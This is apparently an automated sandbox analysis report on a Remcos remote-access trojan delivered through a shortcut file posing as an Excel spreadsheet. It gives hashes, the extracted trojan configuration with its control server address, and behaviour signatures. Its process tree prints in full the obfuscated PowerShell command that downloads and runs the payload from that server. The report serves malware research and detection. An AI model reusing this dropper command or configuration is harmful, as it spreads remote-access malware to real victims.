Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
27-07-2024 02:06
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240704-en
General
-
Target
rv_luti_2024_roku.xlsx.lnk
-
Size
32KB
-
MD5
ccc8b9cd493472f0d518b807d3951fda
-
SHA1
f76898a4231b6fd71a22781156206a76568b9279
-
SHA256
6d93a42c2bffbf94f703b3bbe6e0e9026d76bfb501367bbeb1c2531e28ac6cab
-
SHA512
40bfa4428eb7a1fa21d2bf75b972196935e6710920827fe49bdae758e3262f761731c2921ea0ef460f8bd2319ff00270787c09888995a276648be7e0cd1580df
-
SSDEEP
48:808xwONuZDa46xCcgPcDpWdCZFXuGdZ+g:808KSuda46xCrPK9uL
Malware Config
Extracted
remcos
huma
81.19.139.74:4343
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-OMQQOG
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 8 2544 powershell.exe 44 2544 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
ScreenShot.exeScreenShot.exepid process 2972 ScreenShot.exe 4336 ScreenShot.exe -
Loads dropped DLL 16 IoCs
Processes:
ScreenShot.exeScreenShot.exepid process 2972 ScreenShot.exe 2972 ScreenShot.exe 2972 ScreenShot.exe 2972 ScreenShot.exe 2972 ScreenShot.exe 2972 ScreenShot.exe 2972 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ScreenShot.exedescription pid process target process PID 4336 set thread context of 3408 4336 ScreenShot.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
explorer.exeScreenShot.exeScreenShot.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenShot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenShot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3924 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exeScreenShot.exeScreenShot.execmd.exepid process 2544 powershell.exe 2544 powershell.exe 2972 ScreenShot.exe 4336 ScreenShot.exe 4336 ScreenShot.exe 3408 cmd.exe 3408 cmd.exe 3408 cmd.exe 3408 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
ScreenShot.execmd.exepid process 4336 ScreenShot.exe 3408 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2544 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 3924 EXCEL.EXE 3924 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE 3924 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.exepowershell.exeScreenShot.exeScreenShot.exeEXCEL.EXEcmd.exedescription pid process target process PID 2740 wrote to memory of 2544 2740 cmd.exe powershell.exe PID 2740 wrote to memory of 2544 2740 cmd.exe powershell.exe PID 2544 wrote to memory of 2972 2544 powershell.exe ScreenShot.exe PID 2544 wrote to memory of 2972 2544 powershell.exe ScreenShot.exe PID 2544 wrote to memory of 2972 2544 powershell.exe ScreenShot.exe PID 2544 wrote to memory of 3924 2544 powershell.exe EXCEL.EXE PID 2544 wrote to memory of 3924 2544 powershell.exe EXCEL.EXE PID 2544 wrote to memory of 3924 2544 powershell.exe EXCEL.EXE PID 2972 wrote to memory of 4336 2972 ScreenShot.exe ScreenShot.exe PID 2972 wrote to memory of 4336 2972 ScreenShot.exe ScreenShot.exe PID 2972 wrote to memory of 4336 2972 ScreenShot.exe ScreenShot.exe PID 4336 wrote to memory of 3408 4336 ScreenShot.exe cmd.exe PID 4336 wrote to memory of 3408 4336 ScreenShot.exe cmd.exe PID 4336 wrote to memory of 3408 4336 ScreenShot.exe cmd.exe PID 3924 wrote to memory of 2004 3924 EXCEL.EXE splwow64.exe PID 3924 wrote to memory of 2004 3924 EXCEL.EXE splwow64.exe PID 4336 wrote to memory of 3408 4336 ScreenShot.exe cmd.exe PID 3408 wrote to memory of 3064 3408 cmd.exe explorer.exe PID 3408 wrote to memory of 3064 3408 cmd.exe explorer.exe PID 3408 wrote to memory of 3064 3408 cmd.exe explorer.exe PID 3408 wrote to memory of 3064 3408 cmd.exe explorer.exe PID 3408 wrote to memory of 3064 3408 cmd.exe explorer.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo rohJqtLSzgkhnCsyQdlRvrLx; echo gnKNxpwYQdtqAhfUOOgJMiki; echo uhGwbyOTjoOplglUGgeI; if (-not(Test-Path 'pgg.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvpgg.zip -OutFile pgg.zip}; echo JImCFLVGXVGCYJtCYszgHvwZghmItRgbPblLOsYxfku; Expand-Archive -Path pgg.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/ScreenShot.exe; echo AMaAOEyDSTtcivafWkpIuqJFMWkCVYsArYkSPEnSPKzQeuvLcRviZ; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvracs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo cPOpvQGDupnLMOZZtJyTKSiSmvAsparrHiv; s''t''a''rt rv_luti_2024_roku.xlsx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exeC:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:3064 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122884⤵PID:2004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:4992
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5f20b2385cc01f064837ed7233d34c91a
SHA1e8375ebfd58060fc14c15675663eac2b3897cab6
SHA256d499618f0219b99694422b44a6c713a71666ab85aaccfc9b763203be55a21631
SHA512c028b09de2f41efb568fe74398f161290baa792201893a815842e0f9205464ebc74a87698ef4b167d4bcfbabcecd5b8031223d8f65513958e94d673fe1d6bf73
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
386B
MD5b66d33aa3bb25b73a80f7e7cf7e09cd5
SHA1d4f1a111ba8b5a2af148ed8c3e9072bedf074d0e
SHA2560a167ea542b9a848fb7bd1031608ae33b4652ad1e80da13387b43bc2ccbf128c
SHA512a515ffa76532363d5f6d1441cd3ab3c35d5993e8437ac3fc79528a581a064b818a2cd5519548aa38637ba6ba667ffc84cef0dab54ccc69b6f90a65c97ba91ac5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize2KB
MD5023cf3fbb7319869171b2f5526eff2d2
SHA156bdeb66d926d15a84fa7df87c2753caf7bef123
SHA256f5976b18fa55ded81121ce77cf66db3870c73272ae0a381ed2b4db1497eb2e91
SHA51245cceabb87583eea85f9df4b85b7bf0f26f0072a46fd26aa17111311adcec27daa23cb95749fa3e22b2f4fc044bcecd1890df562e310fa94d288caa43bded175
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5d37e1d20f2faa4733a31e3fa8267d49b
SHA1a9071585941ecf5dd50b3a5dd0ca03b920a2f188
SHA256c161eee4f4c9486427a370075932ec2ae94f7adb3b5c7be912cf6008dd47bfc1
SHA5125259e85403de4f613a5f476aa63e42f849e2b849a08a26f5a47079ad1c1488976ef2dec941ff18a215157248ad1f3625f4bb71f1ffb8340a9e82c5bfc62ffd36
-
Filesize
1.3MB
MD56a2cdd8709524999190f4b43a83108c9
SHA147b472ca518760552d1e0fa2d2321339dd596471
SHA256bd0f954149173d3f5766eee5bd78d5f27ea1ea69667da7b3970b0e6154afc85f
SHA5123b9a50892b7b18480380f69f0eb185b663e82da16064b60a262e9f3181f23ee8510b338eb28af7b961ab555082ffc494cc4fa950610d1991e6d1fa12ba497299
-
Filesize
942KB
MD5e540c4fcecd77b819094eee15ced316a
SHA1d45eb272fdf83641c942c0b7c66aa1ae313738a0
SHA256577ddb0c94d3814a044af5a4ff2591f1e59d227ae00b37358427e2de2d80ff3d
SHA51201ae43e96ae17b121f2c44b2c67f8ef66e7e278331d4c27d98206304b3a25d3dc211c3a1e2e2c6de6c342007cb67dcfbd7b6af7eeec5c5af5ad8421472d09c8e
-
Filesize
29KB
MD5ed5672e9357974fe27faa05c97b9c6ce
SHA1f866486cd73b42d4aedddba71f16cad9d4554fcb
SHA256530f8dbee1036b66a3c77512e216ab0f67779a3640daf2864d1fd8bd7e539c30
SHA512246b0e833f6b081d9a839537039c1b3432501c2d42491cd5feb45e1a82c71e55370532d8854700eea3a335728cb5c4a7a396e6896ff896427a8f95befdf68252
-
Filesize
64KB
MD511efab4068cb4058207959e2638c2c1a
SHA1b1eac0879dcda14bdc0c2efd7f261d7c175208c3
SHA25611e3568f497c40331ee4a9e9973967e61b224e19204e09ed7451da3b74bd2ff5
SHA512ced6167612674232429c25e52ba051994b09fdaeaf3316505904456ef8d7063f2eb03b5a158f0a424f0ecb49673e6a3d6b57d61183c5f8402da3fe53af0bd185
-
Filesize
438KB
MD5562ec96d0f65b0309ad7508d0e0ced11
SHA10fe9dda664f4f8d9ae18603c5a25756710032a6f
SHA256fb64a5954b726d2d0f0bc26113a36dc8a86c469af994ceeaf2e2609743a0a557
SHA512876b82534764b2d156ce64d52771d38f245d330957287773f6b2360f48564b8d4a304449fa6f6400052165aaf433a191af2d3b38b194a9b1e892552dc0805fba
-
Filesize
212KB
MD5a734f2428443030c46db9ce3ab2e68a6
SHA11bf4d3e9b4bf1d801a348f2e46cc9887bae12998
SHA256038511fc64801be03d8472a2f7a6ba8a27e0398cf876be1427c1463cf9190c80
SHA512d829ea13a0d736bee3a788822f5c04e58deff6175da735c25b8031d19e9c3c6bfa40af6882b6e842ba466ba0a5d51c766310491d73261a842334215edf09b699
-
Filesize
1.1MB
MD5e71e48e31ac728a6de7c020645f0c32f
SHA17f86eadd1b7a0ab87b7ce7c2029bdef3d6fe1d8d
SHA25640a1d1a2f276738f568700ddccac99cdcd35b973fc8be86ab826c0d1abc9d6ff
SHA5125e41dbe7efac8a042a14c2f976d1afcd45e3f7531fb60daab61ac17ffd339d34e1c6746fce9e4b591b026598a89e38f36c6d24e33e2de0b39d81806259f9be2a
-
Filesize
1.9MB
MD5c8cff500ac30e5ef120ecb00bcdc0ebb
SHA16dc63844fbc7e9678d8653d715d1f65c8c9f834b
SHA2567867aa9cb994e770c40e5b827d4f689bdc913b3466965b77a2b322d6c526045b
SHA512de393681162c50507f3a54b957c264a25993e28b38ac7f21df9b2ce2eab9177a46e1336a88a5045c75aa66f5e9cf2b5edeef5516225bdd80ed0c01506489e8b0
-
Filesize
223KB
MD58aaa3926885b3fa7ae0448f5e700cb79
SHA147bd7d281ddde5ebef8599482212743bf2f7e67b
SHA25647396c301fbe78bfaf9e344936a0f7a4e6d174c096f847e160d822e48012162d
SHA51286d395ca89ec2a988f035ecb32640ddac99247e2568673246388fe310e8c3a44807049e8f3482fae86c453d5e3529a8f2daf8614a1086b6d979e64fd917bbe3a
-
Filesize
32KB
MD521046015d5d9ef5e536ac7643b1ab365
SHA1f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05
SHA2567a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd
SHA512d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e